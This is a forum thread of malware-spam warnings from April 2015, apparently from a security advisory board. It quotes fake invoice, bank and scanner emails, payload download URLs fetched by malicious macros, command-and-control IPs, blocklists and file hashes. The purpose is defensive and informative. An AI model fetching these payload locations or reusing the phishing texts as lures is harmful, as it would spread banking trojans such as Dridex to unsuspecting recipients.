1 Apr 2015 - "'Sales_Order_6100152' pretending to come from Hazel Gough <hazel.gough@ kosnic .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Sales_Order_6100152.png
1 April 2015 : Sales_Order_6100152.doc ... same malware although renamed as today’s CIH Delivery Note 0051037484 – word doc or excel xls spreadsheet malware*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/cih-delivery-note-0051037484-word-doc-or-excel-xls-spreadsheet-malware/
___
Fake 'Unpaid Invoice' SPAM - vbs malware
- http://myonlinesecurity.co.uk/unpaid-invoice-id99846-or-this-is-your-remittance-advice-id98943-all-random-id-numbers-vbs-malware/
1 Apr 2015 - "'Unpaid Invoice or This is your Remittance Advice [ID:98943]' (all random ID numbers) coming from -random- email addresses, persons and companies with a zip attachment is another one from the current bot runs... The attachments on these are so tiny at less than 1kb in size, that users will be easily fooled into thinking that they are harmless. The zips contain [i]an encoded vbs script... The email body is totally -blank- ...
1 April 2015: Random Attachment zip name: Extracts to: 83JHE76328475243920_1a.doc.vbs
Current Virus total detections: 0/58* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/95d8ece0a7f56f84b4a16c1e461d1c72a92b06ca5a61ade3ce58f8138ee806a8/analysis/1427886418/
- http://blog.dynamoo.com/2015/04/malware-spam-unpaid-invoice-09876.html
1 Apr 2015 - "... has -no- body text and comes from random senders... It has a ZIP attachment which contains... a malicious VBS script... very similar to the VBA macro used in this spam run yesterday:
> http://blog.dynamoo.com/2015/03/malware-spam-83433-your-latest.html
This binary has a detection rate of 4/55*..."
* https://www.virustotal.com/en/file/c6aa69524212e81a8c5e32287437c803d27b789abcf4d01da9b66f7826ed5254/analysis/1427886150/
... Behavioural information
TCP connections
188.120.225.17: https://www.virustotal.com/en/ip-address/188.120.225.17/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
___
Fake 'Remittance' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-remittance-advice-word-doc-or-excel-xls-spreadsheet-malware/
1 Apr 2015 - "'Your Remittance Advice NB PRIVATE EQUITY PARTNERS LTD' (the company name is totally random but matches the name in the body) coming from random email addresses from with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The attachment name matches the advice in the body and looks like:
Dear sir or Madam,
Please find attached a remittance advice (ZL147QNXM.doc) for your information.
Should you need any further information, please do not hesitate to contact us.
Best regards
NB PRIVATE EQUITY PARTNERS LTD
1 April 2015 : ZL147QNXM.doc - Current Virus total detections: 1/57*
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/59a6d8247c2cf78a7300d091f4f4bb201dd142454610824158dd3cecf42d8b1b/analysis/1427895461/
- http://blog.dynamoo.com/2015/04/malware-spam-your-remittance-advice.html
1 Apr 2015 - "... Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78 "
___
Fake 'o/s invoices' SPAM – PDF malware
- http://myonlinesecurity.co.uk/van-sweringen-os-invoices-lisa-anderson-fake-pdf-malware/
1 Apr 2015 - "'Van Sweringen o/s invoices' pretending to come from Lisa Anderson <landerson@ homewatchcaregivers .com> with a zip attachment is another one from the current bot runs... The email looks like:
Outstanding invoices attached!
Thank you!
Lisa
Lisa J. Anderson/Office Manager
Homewatch CareGivers of
23811 Chagrin Blvd. Suite 114
Beachwood, OH 44122 ...
1 Ap[ril 2015: 6100_NULGE.zip : Extracts to: en_en.exe
Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0261a0a211d0baffb29712baeb40bfebe8685c9be6346b5e00eaaae9ea045218/analysis/1427902354/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/ <<<
94.23.6.64: https://www.virustotal.com/en/ip-address/94.23.6.64/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/ <<<
___
Xtube Exploit leads to Cryptowall Malware
- https://blog.malwarebytes.org/intelligence/2015/03/xtube-exploit-led-to-cryptowall-malware/
31 Mar 2015 - "We wrote about the adult site xtube .com being compromised -redirecting- visitors to a landing page for the Neutrino Exploit kit last week*... The malware that dropped from the exploit was found here** and was called xtube.exe... All user files are encrypted using “RSA-2048″ encryption. In order to pay the -ransom- victims are instructed to visit paytoc4gtpn5cz12.torconnectpay .com. A separate address is also provided over the tor network:
> https://blog.malwarebytes.org/wp-content/uploads/2015/03/HELP_DECRYPT.png
... 'always good to remember that highly ranked websites (including adult content) are a prime target for hackers due to the traffic they get..."
* https://blog.malwarebytes.org/exploits-2/2015/03/adult-site-xtube-serves-malware-via-neutrino-ek/
** https://www.virustotal.com/en/file/c4db759ef1dc9d4d8ca8e776fa7d2e4bdc91e7d8d91a2466121c7b72c45e1357/analysis/
... Behavioural information
TCP connections
188.165.164.184: https://www.virustotal.com/en/ip-address/188.165.164.184/information/
93.185.106.78: https://www.virustotal.com/en/ip-address/93.185.106.78/information/
- http://blog.trendmicro.com/trendlabs-security-intelligence/crypto-ransomware-sightings-and-trends-for-1q-2015/
April 1, 2015 - "Since the start of 2015, we have spotted several variants of crypto-ransomware plague the threat landscape. In January, the Australia-New Zealand region was beset by variants of TorrentLocker. But we soon discovered that TorrentLocker infections were -not- limited to that region; Turkey, Italy, and France were also affected by this malware. We soon came across an “improved” version of CTB-Locker Ransomware, which now offered a “free decryption” service, an extended deadline to decrypt the files, and an option to change the language of the ransom message. We also saw attacks that combined crypto-ransomware with information-stealing malware. These latest crypto-ransomware variants bring their own tactic to ensure their victims pay the price..."
(More detail at the trendmicro URL above.)
:fear::fear: :mad:
AplusWebMaster
2015-04-02, 14:44
FYI...
Fake 'Invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/invoice-attached-kayel-brewery-supplies-gary-laker-word-doc-or-excel-xls-spreadsheet-malware/
2 Apr 2015 - "'Invoice Attached' pretending to come from Kayel Brewery Supplies <sales@ kayel .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-Attached.png
23 April 2015 : I32230.doc - Current Virus total detections: 2/57* | 2/56**
... at least one of the macros downloads http ://WORKSPACECEGLARSKI .COM/025/42.exe ... 2 versions of this malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/7fef88dfa4fbdd7c5373aa88a4289790527c7098db94ea6f9de2b2cbc20ecb9d/analysis/1427962106/
** https://www.virustotal.com/en/file/352a6804f3bdade9f620e33ed79c7340530ee3254a223d2061a8240c4443c624/analysis/1427962238/
___
Fake 'P.O.' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/purchase-order-4390-r-tech-welding-dylan-emery-word-doc-or-excel-xls-spreadsheet-malware/
2 Apr 2015 - "'Purchase Order 4390' pretending to come from Sales R-Tech <sales@ r-techwelding .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Purchase-Order-4390-1024x738.png
2 April 2015 : Purchase Order 4390.doc* ... same malware and download locations as today’s other macro malware downloaders Invoice Attached Kayel Brewery Supplies Gary Laker – word doc or excel xls spreadsheet malware* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-attached-kayel-brewery-supplies-gary-laker-word-doc-or-excel-xls-spreadsheet-malware/
___
Fake 'Purchase Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/medico-legal-report-expert-purchase-invoice-dasmedical-fake-pdf-malware/
2 Apr 2015 - "'[426168]( random) Medico-Legal Report Expert Purchase Invoice' pretending to come from case <case@ dasmedical .co.uk> with a zip attachment is another one from the current bot runs... The email looks like:
Please find the attached documents
1. The expert Purchase Invoice.
2 April 2015: 426168_Y8b4fBMdb_551D0159.F9F84862@ ....co.uk.zip: Extracts to: invoice.exe
Current Virus total detections: 2/56* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/010ae3e096446d50fadc93054eabf0601711e92afd9373cae18776656ea9873b/analysis/1427967925/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
199.189.85.156: https://www.virustotal.com/en/ip-address/199.189.85.156/information/
___
Fake 'bank invoice' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-invoicebanklineulsterbanki.html
2 Apr 2015 - "This fake banking email leads to malware.
From: invoice@ bankline.ulsterbank .ie [invoice@ bankline .ulsterbank.ie]
Date: 2 April 2015 at 11:46
Subject: Outstanding invoice
Dear [victim],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here
I would be grateful if you could look into this matter and advise on an expected payment date .
Courtney Mason
Credit Control
Tel: 0845 300 2952
The link in the email leads to a download location at hightail .com (the sample I saw downloaded from https ://www.hightail .com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.
The executable has a VirusTotal detection rate of 3/57* and has characteristics that identify it as Upatre. Automated analysis tools... show that it downloads additional components from:
eduardohaiek .com/images/wicon1.png
edrzambrano .com.ve/images/wicon1.png
It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:
http ://141.105.141.87 :13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57**. This is probably the Dyre banking trojan.
Recommended blocklist:
141.105.140.0/22
eduardohaiek .com
edrzambrano .com
MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6 "
* https://www.virustotal.com/en/file/d7720a995dab294e18ad74b25432d6af088763cc3c5c9408d997bf950f6fb04f/analysis/1427971860/
** https://www.virustotal.com/en/file/a4709678e1ac21b33a11012ebf1ad8638ed9c687c39a7d0f0d8ead87a14b4692/analysis/1427972349/
___
Fake 'scanned docs' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-scanned-document-from.html
2 Apr 2015 - "These fake scanner emails follow a well-established pattern. Instead of containing a scanned document they have a malicious attachment.
From: Cindy Pate [Caroline.dfd@ flexmail .eu]
Date: 2 April 2015 at 11:09
Subject: Scanned document from HP Scanner [66684798]
Reply to: HP-Scanner@ flexmail .eu
Model:KX-240NGZDC
Location: 1st Floor Office
File Format: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Use Microsoft Office Word of Microsoft Corporation to view the document...
I have seen three different malicious attachments with low detection rates... which appear to contain one of two macros... which download a further component from one of the following locations:
http ://93.158.117.163 :8080/bz1gs9/kansp.jpg
http ://78.47.87.131 :8080/bz1gs9/kansp.jpg
Those servers are almost definitely malicious in other ways, the IPs are allocated to:
93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)
This is then saved as %TEMP%\sdfsdffff.exe ... Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.
Recommended blocklist:
188.120.225.17
92.63.88.0/24
121.50.43.175
95.163.121.0/24
82.151.131.129
46.19.143.151
45.55.154.235
195.130.118.92
199.201.121.169
95.211.168.10
222.234.230.239
93.158.117.163
78.47.87.131 ..."
___
Fake 'Snap on Tools invoice copies' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-copy-invoices-snap-on.html
2 Apr 2015 - "This -fake- invoice does not come from Snap On Tools, but is instead a simple forgery.
From: Allen, Claire [Claire.Allen@ snapon .com]
Date: 24 February 2015 at 14:41
Subject: Copy invoices Snap on Tools Ltd
Good Afternoon
Attached are the copy invoices that you requested.
Regards
Claire
Your message is ready to be sent with the following file or link attachments:
SKETTDCCSMF14122514571 ...
... attachment SKETTDCCSMF14122514571.doc which contains this malicious macro... which downloads a further component from:
http ://ws6btg41m.homepage. t-online .de/025/42.exe
This executable has a detection rate of 5/57*. Various automated analyses... show attempted communications to the following IPs:
91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)
According to this Malwr report it drops another version of the downloader called edg1.exe [VT 4/57**] and a malicious Dridex DLL [VT 2/57***].
Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227 ..."
* https://www.virustotal.com/en/file/77239513413e26259e249ab1ad8a7b47c24fa51ae12c9459eea43bb795247a31/analysis/1427978113/
** https://www.virustotal.com/en/file/ea91f19da1091ec2df6d67f4bc48c71779e1d60722169387eb556abea3b891b2/analysis/1427979096/
*** https://www.virustotal.com/en/file/edaf9629ea5d0ba91cbb5165db2f7487999d349e875047ff0527761f1e293e89/analysis/1427979103/
:fear: :mad:
AplusWebMaster
2015-04-03, 15:04
FYI...
Fake 'Scanned Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/scanned-invoice-89412268-from-flybe-group-plc-word-doc-or-excel-xls-spreadsheet-malware/
3 Apr 2015 - "'Scanned Invoice [89412268] from FLYBE GROUP PLC' pretending to come from Warren Horn <Moses.3a@ tcl. net .in> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Location: 1st Floor Office
File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Warren Horn , FLYBE GROUP PLC
3 April 2015: 89412268.doc - Current Virus total detections: 0/56*
This downloads http ://75.150.62.121 :8080/bz1gs9/kansp1.jpg and then renames it to %temp%\dfsdfff.exe and runs without any further user interaction (VirusTotal**) ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f984b5753b1d7570dc03d8de6456ea620b2fc4426684d3e5befeaefbad5b9a83/analysis/1428054150/
** https://www.virustotal.com/en/file/e04733cbb549994674e5ebc36e925f3d4b72823ec57dc5796dac07c3df00bf68/analysis/1428057630/
... Behavioural information
TCP connections
151.252.48.36: https://www.virustotal.com/en/ip-address/151.252.48.36/information/
185.35.77.12: https://www.virustotal.com/en/ip-address/185.35.77.12/information/
199.201.121.169: https://www.virustotal.com/en/ip-address/199.201.121.169/information/
193.255.201.86: https://www.virustotal.com/en/ip-address/193.255.201.86/information/
188.226.129.49: https://www.virustotal.com/en/ip-address/188.226.129.49/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
75.150.62.121: https://www.virustotal.com/en/ip-address/75.150.62.121/information/
___
Fake 'calcs attachments' SPAM - PDF malware
- http://myonlinesecurity.co.uk/all-american-ce-nardin-energycalcs-net-ed-wolfe-fake-pdf-malware/
3 Apr 2015 - "'All American C&E/ Nardin' pretending to come from office <office@ energycalcs .net> with a zip attachment is another one from the current bot runs... The email looks like:
Your completed calcs are attached.
The first attachment is your Manual J&S Load calcs.
The second is your Form 405-10 Energy code compliance calc.
If you have any questions, feel free to call.
Thank you so much for your business!
Ed Wolfe- Office Manager
Energycalcs.net, Inc ...
3 April 2015: Random Attachment zip name: Extracts to: iDocs.exe
Current Virus total detections: 4/56* . The attachment with this All American C&E/ Nardin email is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f90002d5c1696bf1d3312ccb6d64e92fdccf69ccc8e45e3d29cbc4a5accd8886/analysis/1428054460/
:fear: :mad:
AplusWebMaster
2015-04-06, 15:27
FYI...
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-3/
6 Apr 2015 - "'Barclays – Important Update, read carefully!' pretending to come from Barclays Online Bank <security-update@ Barclays. co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Barclays-Important-Update-read-carefully.png
6 April 2015: Form.zip: Extracts to: Form.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/b051c64292acb2032c5923bc8652223adfb4ce79c9fe54aff197c7a3aeeaf59e/analysis/1428321955/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
- http://threattrack.tumblr.com/post/115679613423/barclays-important-update-spam
Apr 6, 2015
:fear: :mad:
AplusWebMaster
2015-04-07, 15:13
FYI...
Fake 'EBOLA INFO' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-ebola-information.html
7 Apr 2015 - "This fake medical email contains a malicious attachment...
From: noreply@ ggc-ooh .net
Reply-To: noreply@ ggc-ooh .net
Date: 7 April 2015 at 08:58
Subject: EBOLA INFORMATION
This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ ggc-ooh .net
PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.
THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro... which is contains a lot of girls names as variables ... When decoded the macro downloads a component from:
http ://deosiibude .de/deosiibude.de/220/68.exe
VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools... show it phoning home to the following IPs...:
37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)
85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)
According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.
Recommended blocklist:
37.140.199.100
46.228.193.201
130.241.92.141
46.101.49.125
122.167.6.68
85.255.173.109
5.100.249.215
217.37.39.235
81.190.50.232
46.228.193.201
89.228.15.18
MD5s:
E4CC002A95CAAF4481CB7140BBE96C58
C86A9D012E372D0C3A82B14978FFA1F0
F98A674A5FA473AC9BF738636FF6374E "
___
Fake 'Invoice Maid of London' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/march-2015-invoice-maid-of-london-word-doc-or-excel-xls-spreadsheet-malware/
7 Apr 2015 - "'March 2015 Invoice' pretending to come from Accounts @ Maid of London <accounts@ maidoflondon .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Maid-of-London.png
7 April 2015 : March invoice 811.doc - Current Virus total detections: 0/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/6363da6f3e2b128c55a56232de7170e458b050b529f13779fb7b4d0530d36e52/analysis/1428403055/
___
Fake 'legal claim' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-company-name-has-issued.html
7 Apr 2015 - "This fake legal spam comes with a malicious attachment:
From: Isiah Mosley [Rosella.e6@ customer .7starnet .com]
Date: 7 April 2015 at 14:09
Subject: Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]
Schroders,Isiah Mosley
The company name is randomly chosen. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro... Along with an alternate macro, I can see download locations from:
http ://185.39.149.178 /aszxmy/image04.gif
http ://148.251.87.253 /aszxmy/image04.gif
For the record, 185.39.149.178 is OOO A.S.R.in Russia and 148.251.87.253 is Hetzner in Germany. The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56*. Automated analysis tools... show the malware phoning home to:
151.252.48.36 (Vautron Serverhousing, Germany)
According to the Malwr report, it drops a DLL with a detection rate of 2/56* which is most likely a Dridex DLL.
Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178
MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0"
* https://www.virustotal.com/en/file/5a3aba781908dbaa7a0e75f144d4c240ea61641782855b918b7258f2279a0281/analysis/
___
Fake 'Chase Card Services' SPAM – malware
- http://myonlinesecurity.co.uk/chase-card-services-thank-you-for-scheduling-your-online-payment-malware/
7 Apr 2015 - "'Thank you for scheduling your online payment' pretending to come from Chase Card Services <no-reply@ alertsp .chase .com> with a zip attachment is another one from the current bot runs...
Dear Thank you for scheduling your recent credit card payment as an attachment. Your payment in the amount of 3898.96 will be credited to your credit card account (CREDIT CARD) ending in 2143 on 04/07/2015.
Now that you’re making your payment online, are you aware of all the convenient ways you can manage your account online?
See statements – Choose to stop receiving paper statements, and see up to six years of your statements online.
See automatic payments – Set up monthly payments to be made automatically.
Transfer a balance – Transfer a balance to your credit card account.
Go to Personalized Alerts – Schedule Alerts to remind you of key account activity.
You can also see past payments you’ve made online by logging on to www.chase.com/creditcards and clicking “See/cancel payments” under “I’d like to …”
If you have questions, please call the Customer Service number on the back of your credit card.
Thanks again for using online payments.
Sincerely,
Cardmember Services ...
7 April 2015: payment-2143-wiqr_BSFMN.zip: Extracts to: payment.exe
Current Virus total detections: 7/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF or image file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dda530220c7196a25fe5119dae77006879ce67974fe520512ecf103841ed0bed/analysis/1428417618/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
162.252.57.88: https://www.virustotal.com/en/ip-address/162.252.57.88/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
:fear::fear: :mad:
AplusWebMaster
2015-04-08, 11:39
FYI...
- http://krebsonsecurity.com/2015/04/fbi-warns-of-fake-govt-sites-isis-defacements/
Apr 7, 2015
Fake Government Websites ...
- https://www.us-cert.gov/ncas/current-activity/2015/04/07/IC3-Issues-Alert-Fake-Government-Websites
Apr 7, 2015 - "The Internet Crime Complaint Center (IC3) has released an alert that warns consumers of fraudulent government-services websites that mimic legitimate ones. Scam operators lure consumers to these -fraudulent- websites in order to steal their personal identifiable information (PII) and collect fees for services that are never delivered. US-CERT encourages users to review the IC3 Alert* for details and refer to the US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* http://www.ic3.gov/media/2015/150407-2.aspx
Apr 7, 2015
** https://www.us-cert.gov/ncas/tips/ST04-014
Apr 7, 2015
___
Web Site Defacements ...
- https://www.us-cert.gov/ncas/current-activity/2015/04/07/IC3-Releases-Alert-Web-Site-Defacements
Apr 7, 2015 - "The Internet Crime Complaint Center (IC3) has issued an alert addressing recently perpetrated Web site defacements. The defacements advertise themselves as associated with the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and al-Shams (ISIS). However, FBI assesses that the perpetrators are -not- actually associated with this group. The perpetrators exploit WordPress content management system (CMS) vulnerabilities, leading to disruptive and costly effects. Users and administrators are encouraged to review the IC3 Alert* for details and refer to the US-CERT Alert TA13-024A** for information on CMS security."
* http://www.ic3.gov/media/2015/150407-1.aspx
Apr 7, 2015
** http://www.us-cert.gov/ncas/alerts/TA13-024A
Apr 7, 2015
___
Fake 'UNPAID INVOICES' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-two-unpaid-invoices-wayne.html
8 Apr 2015 - "This -fake- invoice spam is not from Orion Plastics but is instead a simple forgery with a malicious attachment.
From: Wayne Moore [wayne44118@ orionplastics .net]
Date: 8 April 2015 at 09:03
Subject: TWO UNPAID INVOICES
4/3----- LAST WEEK I CALLED REGARDS TWO UNPAID INVOICES FROM JAN 2015
INVOICE # 029911 DATED 1/7/15 FOR $840.80
INVOICE # 030042 DATED 1/30/15 FOR $937.00
PLEASE ADVISE WHEN YOU SENT CHECK AND TO WHAT ADDRESS
I HAVE ATTACHED THE NEW REMIT TO ADDRESS IN CASE YOU DON’T HAVE IT
REGARDS-WAYNE
In this case the email was -malformed- and the attachment REMITTANCE & WIRE TRANSFER ADDRESS.DOC wasn't downloadable (this may be a temporary problem). The document has a detection rate of just 1/56*. Extracting the document revealed this malicious macro... which downloads an additional component from:
http ://fzsv .de/11/004.exe
There are usually other download locations in different variants of the document, but the downloaded executable will be the same. The executable is saved as %TEMP%\c48.exe. This malicious binary has a detection rate of 6/54**. Automated analysis tools... shows it phoning home to the following IPs:
37.140.199.100 (Reg.Ru Hosting, Russia)
176.67.160.187 (UK2, UK)
81.148.134.130 (BT, UK)
46.228.193.201 (Aqua Networks Ltd, Germany)
83.136.80.46 (myLoc, Germany)
The Malwr report shows it attempting to connect to a couple of Akamai IPs that I suspect are NOT malicious and would cause collateral damage if blocked:
90.84.136.185
184.25.56.220
According to the same Malwr report it drops a Dridex DLL with a detection rate of 4/57**.
Recommended blocklist:
37.140.199.100
176.67.160.187
81.148.134.130
46.228.193.201
83.136.80.46
MD5s:
3e3a09644170ad3184facb4cace14f8a
671c65cedc8642adf70ada3f74d5da19
14c2795bcc35c3180649494ec2bc7877 "
* https://www.virustotal.com/en/file/e2c4163b16258ea8719d39be8ac30b9020fcfb6616f70fefcc4471b6318d0ce4/analysis/1428485931/
** https://www.virustotal.com/en/file/434fe2d5b2b26d3b14d2959567822f9b08730144d7e9ceb234db1f477e2faf2d/analysis/1428485937/
___
Fake 'BACS Transfer' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bacs-transfer-remittance-for-jsag783gbp-fake-pdf-malware/
8 Apr 2015 - "'BACS Transfer : Remittance for JSAG783GBP' pretending to come from random names and email addresses at natwest .com with a zip attachment is another one from the current bot runs... The email which has random amounts looks like:
We have arranged a BACS transfer to your bank for the following amount : 4278.00
Please find details attached.
8 April 2015: BACS_Transfer_AQ004719.zip : Extracts to: BACS_Transfer_AQ004719.scr
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/036daf4501d0f9c76ebf75c709fcd647eab5436bc3028ceb8ffd431110e2616a/analysis/1428491113/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
66.7.216.61: https://www.virustotal.com/en/ip-address/66.7.216.61/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Password Re-activation' SPAM - PDF malware
- http://myonlinesecurity.co.uk/bankline-roi-password-re-activation-form-fake-pdf-malware/
8 Apr 2015 - "'Bankline ROI – Password Re-activation Form' pretending to come from various names and email addresses @rbs .co .uk with a zip attachment is another one from the current bot runs... The email looks like:
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form.
Fax to 1850 262125 or alternatively you may wish to email the completed document, by attaching it to an email and sending it to banklineadministration@ rbs .co .uk
On receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email.
<<Bankline_Password_reset_3978322.pdf>>
Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered.
Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details.
If you are the sole Standard Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in a Standard Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner.
If you require any further assistance then please do not hesitate to contact us on 1850 245140 and one of our associates will be happy to assist you.
Regards
Bankline Product Support ...
Same malware payload, although -renamed- as Bankline_Password_reset_0319234.zip (random numbers) as today’s NatWest attempt BACS Transfer : Remittance for JSAG783GBP – fake PDF malware* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/bacs-transfer-remittance-for-jsag783gbp-fake-pdf-malware/
___
Fake 'Invoice' SPAM - malicious doc/xls
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-from-company-name.html
